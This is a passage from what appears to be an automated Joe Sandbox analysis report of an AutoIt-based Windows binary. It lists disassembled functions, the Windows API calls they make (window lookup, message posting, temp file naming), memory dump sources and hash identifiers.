                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Message_doexit
                                                                                                                      • String ID: AutoIt$Error allocating memory.
                                                                                                                      • API String ID: 1993061046-4017498283
                                                                                                                      • Opcode ID: e847a93158979213662c6afcc3a40fe7303b88a3de4c5260bb9ba003355fb9d8
                                                                                                                      • Instruction ID: 9f2b23bf95852aa0da94f6df0f2049cd002b76740e6871bb628ba8d9d1ba4ee1
                                                                                                                      • Opcode Fuzzy Hash: e847a93158979213662c6afcc3a40fe7303b88a3de4c5260bb9ba003355fb9d8
                                                                                                                      • Instruction Fuzzy Hash: 69D0123238835832D21622987C07FC5B6888F09B51F150017BF08A91C28AD6A890529D
                                                                                                                      Function 004084C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004084DF
                                                                                                                      • PostMessageW.USER32(00000000), ref: 004084E6
                                                                                                                        • Part of subcall function 003E8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 003E83CD
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                      • API String ID: 529655941-2988720461
                                                                                                                      • Opcode ID: 6ced5f421312e2da23862ced034f44c303770e21463f2a8b05244a929f43f0fe
                                                                                                                      • Instruction ID: 69f3e61696de498a7ffdcadfbcf72119b43658b1db3f95a0564e2396cb4ab32d
                                                                                                                      • Opcode Fuzzy Hash: 6ced5f421312e2da23862ced034f44c303770e21463f2a8b05244a929f43f0fe
                                                                                                                      • Instruction Fuzzy Hash: 17D02232B803107BFB32AB709C0FFC36604EB28B02F500A397309AA1C0CCE4B800C228
                                                                                                                      Function 00408495 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0040849F
                                                                                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 004084B2
                                                                                                                        • Part of subcall function 003E8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 003E83CD
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                      • API String ID: 529655941-2988720461
                                                                                                                      • Opcode ID: 8fb55f4fc3da74ad1ff5b7b0629fb262cc0a17b7c8eac334ff84482950251418
                                                                                                                      • Instruction ID: ffc7eca437e61bb56b3fd9ec925fdd820640c8ef68647ef4d9b3228aa83aad90
                                                                                                                      • Opcode Fuzzy Hash: 8fb55f4fc3da74ad1ff5b7b0629fb262cc0a17b7c8eac334ff84482950251418
                                                                                                                      • Instruction Fuzzy Hash: 85D02236B84310B7EB31AB709C0FFC36A04EB24B02F100A39730DAA1C0CCE4B800C228
                                                                                                                      Function 003ED009 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 003ED01E
                                                                                                                      • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 003ED035
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Temp$FileNamePath
                                                                                                                      • String ID: aut
                                                                                                                      • API String ID: 3285503233-3010740371
                                                                                                                      • Opcode ID: a245be64b92f1c476b0bed46dccc741253802447562cb56a0a72f5047633a75b
                                                                                                                      • Instruction ID: 65f524041169fac9d8be35bb3260824cff75acb42580a1f7e54ef42fac932bdf
                                                                                                                      • Opcode Fuzzy Hash: a245be64b92f1c476b0bed46dccc741253802447562cb56a0a72f5047633a75b
                                                                                                                      • Instruction Fuzzy Hash: 4BD05EF1A4030EBBDB20ABA0ED0EF99B76CA700705F6041A17A14D10D1D2B4E64A8BA9
                                                                                                                      Function 003DCB3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 003DCB4B
                                                                                                                      • SendMessageW.USER32(00000000,00001200,00000000,00000000), ref: 003DCB59
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 3850602802-2594219639
                                                                                                                      • Opcode ID: ac1b08791141144cd4c318dc732d1b742f08f99c6cd384dd2c36522002cb9abd
                                                                                                                      • Instruction ID: fcf885f61e7194d2204f021f9766525158d89d866a42793a978da669cccae9c6
                                                                                                                      • Opcode Fuzzy Hash: ac1b08791141144cd4c318dc732d1b742f08f99c6cd384dd2c36522002cb9abd
                                                                                                                      • Instruction Fuzzy Hash: 5DC04C716405C0BAE7311B67BC0DD473E3EE7CBF51751426CF215960A686790056D678